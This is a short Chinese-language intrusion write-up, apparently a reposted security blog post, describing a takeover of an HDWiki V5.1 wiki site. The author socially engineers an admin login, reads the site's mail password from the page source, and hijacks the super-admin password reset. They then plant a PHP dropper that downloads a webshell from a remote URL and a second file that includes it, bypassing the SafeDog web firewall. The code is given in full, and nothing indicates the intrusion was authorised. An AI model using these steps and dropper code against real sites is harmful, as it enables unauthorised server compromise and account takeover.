HDWiki V5.1百科系统后台过安全狗拿shell
偶遇一hdwiki百科系统站,前台在词条创建人处发现一管理员
进接通过账号社进后台,后台工能很强大,但是发现限权不够
在会员管理处发现还存在超级管理员这类账号
社工admin无果
反回后台,发现管理员帐号可以对网站的邮箱进行配置
用的腾讯企业邮箱,通过查看源码直接获取邮箱密码
反回网站前台,在密码找回处填上刚才找到的admin邮箱,admin的密码找回链接会通过刚找到的邮箱发送
在网页登录刚才的腾讯腾讯企业邮箱,在发件箱中看到admin的密码找回链接
直接重置admin密码,再次登录后台,看到文件管理处很强大,可以新建文件也可以上传
直接新建大马,被安全狗档住了
新建getshell.php,
代码
lt;?php $remotecode = $_REQUEST['code']; $targetfile = $_REQUEST['file']; $shellcode = file_get_contents($remotecode); $fp = fopen($targetfile,"a"); fwrite($fp,$shellcode); ?gt;
通过 getshell.php?code=http://木马路径file=1.txt,绕过安全狗对POST数据包检测的限制,让服务器下载我们的大马保存为1.txt
这是用到一个php的函数 file_get_contents()
这个函数可以从远程文件中读取内容
但前提是 php.ini 中allow_url_fopen 得为 on 才行
再新建shell.php
代码
lt;?php require_once ("1.txt"); ?gt;
利用php文件包含来绕过过安全狗对文件内容检限制
ignore_js_op
成功拿到shell一枚
没什么技术含量,大牛略过
来源:Panni_007 Security